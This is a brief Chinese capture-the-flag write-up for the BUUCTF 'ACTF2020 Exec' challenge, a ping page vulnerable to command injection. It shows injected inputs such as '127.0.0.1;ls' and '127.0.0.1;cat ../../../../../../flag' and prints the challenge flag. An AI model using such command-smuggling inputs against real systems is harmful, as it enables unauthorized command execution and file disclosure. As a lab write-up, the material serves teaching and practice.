BUUCTF[ACTF2020 新生赛]Exec 1题解
- 分析
- 解题过程
- 总结:
分析
先分析题目:exc()是一个内部调用shell命令的函数,同样的函数还有system(),
创建靶机,打开网址,是一个和PING相关的网页,查看源代码,没有提示,ping 127.0.0.1,可以ping通,说明正常执行了命令,根据题目的提示和实验,初步判断是命令注入漏洞。
解题过程
- 尝试输入
127.0.0.1;ls
说明ls正常执行 - 输入
127.0.0.1;ls ../
正确执行,说明没有进行过滤。
3. 输入127.0.0.1;ls ../../../../../../:
- 输入
127.0.0.1;cat ../../../../../../flag:
flag{bda3a63d-74e3-4e9f-8dab-c5c6ea0c1bd9}
总结:
这道题目的提示比较明显,针对文件注入没有进行任何过滤,还是非常简单的。
![[yolov11改进系列]基于yolov11引入特征融合注意网络FFA-Net的python源码+训练源码](https://i-blog.csdnimg.cn/direct/716deebf62944b0cab3446366c833501.jpeg)
